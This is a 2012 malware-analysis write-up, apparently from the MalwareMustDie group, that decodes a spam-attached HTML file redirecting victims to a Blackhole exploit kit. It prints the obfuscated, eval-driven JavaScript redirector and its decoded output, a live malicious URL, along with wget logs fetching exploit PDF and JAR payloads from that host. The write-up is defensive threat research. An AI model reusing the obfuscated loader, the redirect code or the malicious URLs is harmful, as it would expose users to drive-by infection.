====================================== #MalwareMustDie ; @unixfreaxjp ~]$ date Thu Nov 22 17:27:12 JST 2012 The finding of the obfuscation version PluginDetect 0.7.9 And a guide how to decode it manually WARNING: The urls in the note is may infect your PC, do not attempt to click them ======================================= I had reports of two infections of email attached with obfuscated HTML infector in the twitter thanks to @KDPryor as per following pic snapshots; https://twitter.com/MalwareMustDie/status/271104793567707137 https://twitter.com/MalwareMustDie/status/271439256264777728 ----------------------------------------------------------------------- //The attached HTML infector looks like this: Please wait..

You will be forwarded... Please wait..

Internet Explorer and Mozilla Firefox compatible only

---------------------------------------------------------------- // contains the ↑obfuscated redirector by javascript: // which can be decoded easily with the below methods.... // PS: The pic of this deobfuscation is in here: https://pbs.twimg.com/media/A8Mk_pOCYAEm_lL.jpg:large try { if(window.document)window["doc"+"ument"]["body"]="vasasf" } catch(bawetawe) { if(true) ＜＝＝＝＝＝＝＝＝＝＝ // ^^^^^^^ { v=1;　＜＝＝＝＝＝＝＝＝＝＝＝＝＝＝ // ^^^^^^ try { fawbe-- } catch(afnwenew) { try { (v+v)() } catch(gngrthn) { try { if(020===0x10)v["document"]["bo"+"dy"]="123" } catch(gfdnfdgber) { m=123; if("".substr)ev=eval; } } n=["4i","3m","4e","1o","2b","22","27","29","a","4i","3m","4e","20","2b","4i","3m","4e","1o","29","a","45","42","1f","4i","3m","4e","1o","2b","2b","4i","3m","4e","20","1g","17","4n","40","4b","3o","4h","49","41","4a","4g","1l","48","4b","3o","3m","4g","45","4b","4a","2b","19","44","4g","4g","4c","28","1m","1m","44","3m","49","3m","4f","4h","4g","4e","3m","1l","4e","4h","28","26","1n","26","1n","1m","42","4b","4e","4h","49","1m","48","45","4a","47","4f","1m","3o","4b","48","4h","49","4a","1l","4c","44","4c","19","29","50","a"]; h=2; s=""; if(m)for(i=0;i-106!=0;i++) { k=i; if(true)s+=String.fromCharCode(parseInt(n[i],25));　＜＝＝＝＝＝＝＝＝ // ^^^^^^^^ } z=s; ev(""+z) } } } ----------------output ↓------------------- var1=49; var2=var1; if(var1==var2) {document.location="http://hamasutra.ru:8080/forum/links/column.php";} --------------------------------------- // let's fetch to know the source... //below is a successful attempt... --12:43:04-- http://hamasutra.ru:8080/forum/links/column.php => `column.php' Resolving hamasutra.ru... 216.24.196.66, 82.165.193.26, 202.180.221.186, ... Connecting to hamasutra.ru|216.24.196.66|:8080... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] 12:43:09 (106.64 KB/s) - `column.php' saved [92154] // unsuccessful attempt is like below reference.... // syou must try again with the different IP/references --12:43:26-- http://hamasutra.ru:8080/forum/links/column.php => `column.php.1' Resolving hamasutra.ru... seconds 0.00, 216.24.196.66, 82.165.193.26, 202.180.221.186, ... Caching hamasutra.ru => 216.24.196.66 82.165.193.26 202.180.221.186 203.80.16.81 Connecting to hamasutra.ru|216.24.196.66|:8080... seconds 0.00, connected. Created socket 1896. Releasing 0x003d5560 (new refcount 1). ---request begin--- GET /forum/links/column.php HTTP/1.0 Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Accept: */* Host: hamasutra.ru:8080 Connection: Keep-Alive ---request end--- HTTP request sent, awaiting response... ---response begin--- HTTP/1.1 502 Bad Gateway Server: nginx/1.0.10 Date: Thu, 22 Nov 2012 03:43:22 GMT Content-Type: text/html; charset=CP-1251 Connection: keep-alive // This is the file fetched... // @unixfreaxjp /malware]$ date Thu Nov 22 12:47:02 JST 2012 @unixfreaxjp /malware]$ ls -alF -rwx------ 1 xxxx xxxx 92154 Nov 21 18:43 column.php* // The inside of the fetched column.php as per below... // It is obfuscated Plugindetect 0.7.9 <==== POINT!

0)s=s.concat(ss(p(a.substr(i,2),23)-1)); } c=s; try{window.document.body=p}catch(egewg){e(""+c)}} ----------------------------------------------------------------------------- // IS this really a BHEK2? // try to fetch t.pdf & jars... // with the current settings... --cookies (cookies) to on --keep-session-cookies (keepsessioncookies) to 1 --save-cookies (savecookies) to mycookies.txt --user-agent (useragent) to MalwareMustDie is banging on your Door --referer (referer) to http://www.ups.com/?Site=Corporate&cookie=am_en_home_none // this is url referer of one of the spam emails // get t.pdf --12:58:25-- http://hamasutra.ru:8080/forum/data/t.pdf Resolving hamasutra.ru... seconds 0.00, 203.80.16.81, 216.24.196.66, 82.165.193.26, ... Caching hamasutra.ru => 203.80.16.81 216.24.196.66 82.165.193.26 202.180.221.186 Connecting to hamasutra.ru|203.80.16.81|:8080... seconds 0.00, connected. Created socket 1896. Releasing 0x003d5528 (new refcount 1). ---request begin--- GET /forum/data/t.pdf HTTP/1.0 Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Accept: */* Host: hamasutra.ru:8080 Connection: Keep-Alive ---request end--- HTTP request sent, awaiting response... ---response begin--- HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Thu, 22 Nov 2012 12:21:44 GMT Content-Type: application/pdf Connection: keep-alive Last-Modified: Fri, 14 Sep 2012 18:03:02 GMT ETag: "13500e4-1fa7-4c9ad3c1e8180" Accept-Ranges: bytes Content-Length: 8103 ---response end--- 200 OK Registered socket 1896 for persistent reuse. Length: 8,103 (7.9K) [application/pdf] 12:58:27 (79.24 KB/s) - `t.pdf' saved [8103/8103] // get spn.jar ---request begin--- GET /forum/data/spn.jar HTTP/1.0 Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Accept: */* Host: hamasutra.ru:8080 Connection: Keep-Alive ---request end--- HTTP request sent, awaiting response... ---response begin--- HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Thu, 22 Nov 2012 04:00:25 GMT Content-Type: application/java-archive Connection: keep-alive Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT ETag: "1350002-32c4-4cf0399618800" Accept-Ranges: bytes Content-Length: 12996 ---response end--- 200 OK Registered socket 1896 for persistent reuse. Length: 12,996 (13K) [application/java-archive] 13:00:31 (85.16 KB/s) - `spn.jar' saved [12996/12996] // get spn2.jar ---request begin--- GET /forum/data/spn2.jar HTTP/1.0 Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Accept: */* Host: hamasutra.ru:8080 Connection: Keep-Alive ---request end--- HTTP request sent, awaiting response... ---response begin--- HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Thu, 22 Nov 2012 04:02:30 GMT Content-Type: application/java-archive Connection: keep-alive Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT ETag: "1350003-4fb8-4cf0399618800" Accept-Ranges: bytes Content-Length: 20408 ---response end--- 200 OK Registered socket 1896 for persistent reuse. Length: 20,408 (20K) [application/java-archive] 3:02:35 (73.93 KB/s) - `spn2.jar' saved [20408/20408] // get spn3.jar ---request begin--- GET /forum/data/spn3.jar HTTP/1.0 Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Accept: */* Host: hamasutra.ru:8080 Connection: Keep-Alive ---request end--- HTTP request sent, awaiting response... ---response begin--- HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Thu, 22 Nov 2012 04:01:38 GMT Content-Type: application/java-archive Connection: keep-alive Last-Modified: Mon, 22 Oct 2012 13:35:13 GMT ETag: "1350005-521e-4cca5ec4d4640" Accept-Ranges: bytes Content-Length: 21022 ---response end--- 200 OK Registered socket 1896 for persistent reuse. Length: 21,022 (21K) [application/java-archive] 13:03:43 (31.58 KB/s) - `spn3.jar' saved [21022/21022] // Let's test whether this is not CoolEK or other EK by testing // special function of BHEK PluginDetect 0.7.9 = getJavaInfo.jar // lets fetch the getJavaInfo.jar ---request begin--- GET /forum/data/getJavaInfo.jar HTTP/1.0 Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Accept: */* Host: hamasutra.ru:8080 Connection: Keep-Alive ---request end--- HTTP request sent, awaiting response... ---response begin--- HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Thu, 22 Nov 2012 04:08:27 GMT Content-Type: application/java-archive Connection: keep-alive Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT ETag: "13504e0-24b-4cf0399618800" Accept-Ranges: bytes Content-Length: 587 ---response end--- 200 OK Registered socket 1896 for persistent reuse. Length: 587 [application/java-archive] 13:10:30 (17.13 MB/s) - `getJavaInfo.jar' saved [587/587] ------------------------------------------------------------------------ // back to the evil script of column.php.. // let's make it beautiful to read...
//↑oh, at the bottom there's a direct download url... // look like a pdf download to me.., // let's assemble the army! no, ...assemble the url↓ ..blah..../forum/links/column.php?hdf=30:1n:1i:1i:33&puihqtt=b&hdmk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pgrzxii=1f:1d:1f:1d:1f:1d:1f -------------------------------------------------- // Let's fetch this file.... Resolving hamasutra.ru... seconds 0.00, 82.165.193.26, 202.180.221.186, 203.80.16.81, ... Caching hamasutra.ru => 82.165.193.26 202.180.221.186 203.80.16.81 216.24.196.66 Connecting to hamasutra.ru|82.165.193.26|:8080... seconds 0.00, connected. Created socket 1896. ---request begin--- GET //forum/links/column.php?hdf=30:1n:1i:1i:33&puihqtt=b&hdmk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pgrzxii=1f:1d:1f:1d:1f:1d:1f HTTP/1.0 Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Accept: */* Host: hamasutra.ru:8080 Connection: Keep-Alive ---request end--- HTTP request sent, awaiting response... ---response begin--- HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Thu, 22 Nov 2012 05:35:20 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Accept-Ranges: bytes Content-Length: 14749 Content-Disposition: inline; filename=1ed92.pdf ---response end--- 200 OK Registered socket 1896 for persistent reuse. Length: 14,749 (14K) [application/pdf] 13:40:29 (23.61 KB/s) - `column.php@hdf=30%3A1n%3A1i%3A1i%3A33&puihqtt=b&hdmk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pgrzxii=1f%3A1d%3A1f%3A1d%3A1f%3A1d%3A1f' saved [14749/14749] // let's rename the long filename into shortone... // caled it infector.pdf ------------------------------------------ // OK we got the many samples.. // We proved it was BHEK2, // We go back to the rest of the garbled code column.php..... // we all want to se the PluginDetect 0.7.9 is really obfuscated or not do we? // OK, let's strip the html code EXCEPT the tags with values.... // To make it easier, let's see the structure of this code first...